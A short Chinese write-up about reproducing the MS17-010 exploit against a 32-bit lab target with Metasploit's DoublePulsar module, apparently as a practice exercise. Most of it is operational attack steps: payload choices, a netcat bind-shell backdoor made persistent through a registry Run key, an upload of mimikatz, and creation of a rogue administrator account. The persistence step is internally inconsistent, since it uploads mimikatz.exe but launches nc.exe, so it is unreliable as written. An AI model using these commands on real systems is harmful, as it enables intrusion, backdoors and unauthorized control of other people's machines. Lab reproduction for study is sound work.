(Metasploit) MS17-010 漏洞复现典中典之双脉冲星 Doublepulsar 模块攻击失败及其解决

以下过程全部经由 Kali Linux,省略掉了那些大家都知道的内容。
对于32位的靶机,永恒之蓝不能工作,因此获取并配置双脉冲星模块,使用前,确认 Wine32 状态正常,设置攻击参数,但攻击失败了,信息显示
Remote code execution... 3... 2... 1...
Exploit completed, but no session was created.
在查阅了能找到的资料后,最终我的成功方案是更换载荷(payload)
下面列出该模块几个最通用的载荷
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell/reverse_tcp
windows/shell/bind_tcp
在我的测试过程中,大多数情况下设置载荷为 windows/meterpreter/bind_tcp 后运行就能得到会话,尽管 reverse_tcp 的安全性高于 bind_tcp,但很无奈,前者就是不干活(很奇怪)。
漏洞利用成功后可能出现的一些其他情况:
如果靶机的 Shell 执行指令后回显乱码,键入
chcp 65001
通常可以大幅改善情况
有些时候靶机会因被攻击而在一分钟内重启,这种情况下可以考虑使用 Netcat 完成持久化工作,Meterpreter 下键入
upload /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe C:\\windows
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 443 -e cmd.exe'
这样我们等待靶机重启后,键入指令进行连接
nc -v [靶机ip] 443
尝试远程桌面登录但 Administrator 账户密码为空( hashdump 因此报错 )而导致无法登录时,使用靶机 Shell 新建一个账户和密码并将其加入管理员,然后用这个账户登录
net user [username] [passwd] /add
net localgroup administrators [username] /add